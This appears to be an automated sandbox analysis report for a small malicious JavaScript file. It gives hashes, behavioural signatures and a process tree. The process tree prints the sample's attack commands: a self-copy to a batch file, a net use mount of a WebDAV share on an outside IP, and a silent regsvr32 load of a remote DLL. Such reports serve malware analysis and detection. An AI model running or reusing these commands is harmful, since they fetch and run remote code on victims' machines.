Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
09/07/2024, 07:29
Static task
static1
Behavioral task
behavioral1
Sample
1603426775218191079.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
1603426775218191079.js
Resource
win10v2004-20240704-en
General
-
Target
1603426775218191079.js
-
Size
5KB
-
MD5
99dd53aabd10500b964e54dd71976462
-
SHA1
f52edd2018f70bf084415e772c128e742d94e440
-
SHA256
b6f8514e0590e879ccd88c011a7dc3b053ce1ea6ec82cb3d56577901e9640a2d
-
SHA512
eb24a20fba738b339a689e437c0c97eb9c607d6e06697b39b1a5d1266616728265d83a1f0bec6b0a883dc242216fbb61af3714daa221e4fde0820b108c241a9a
-
SSDEEP
96:SjNH3YjZzEU8sn5DDOnixUX/A4BbGE9OSbAeEwTtunc/QJWe4AdXALOBVo9t7zAt:2tPr/EUkG2oJm5Nm5klrkdle
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 372 wrote to memory of 1108 372 wscript.exe 85 PID 372 wrote to memory of 1108 372 wscript.exe 85 PID 1108 wrote to memory of 2612 1108 cmd.exe 88 PID 1108 wrote to memory of 2612 1108 cmd.exe 88 PID 1108 wrote to memory of 3320 1108 cmd.exe 89 PID 1108 wrote to memory of 3320 1108 cmd.exe 89
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\1603426775218191079.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:372 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\1603426775218191079.js" "C:\Users\Admin\\dqrwzx.bat" && "C:\Users\Admin\\dqrwzx.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2612
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\199.dll3⤵PID:3320
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD599dd53aabd10500b964e54dd71976462
SHA1f52edd2018f70bf084415e772c128e742d94e440
SHA256b6f8514e0590e879ccd88c011a7dc3b053ce1ea6ec82cb3d56577901e9640a2d
SHA512eb24a20fba738b339a689e437c0c97eb9c607d6e06697b39b1a5d1266616728265d83a1f0bec6b0a883dc242216fbb61af3714daa221e4fde0820b108c241a9a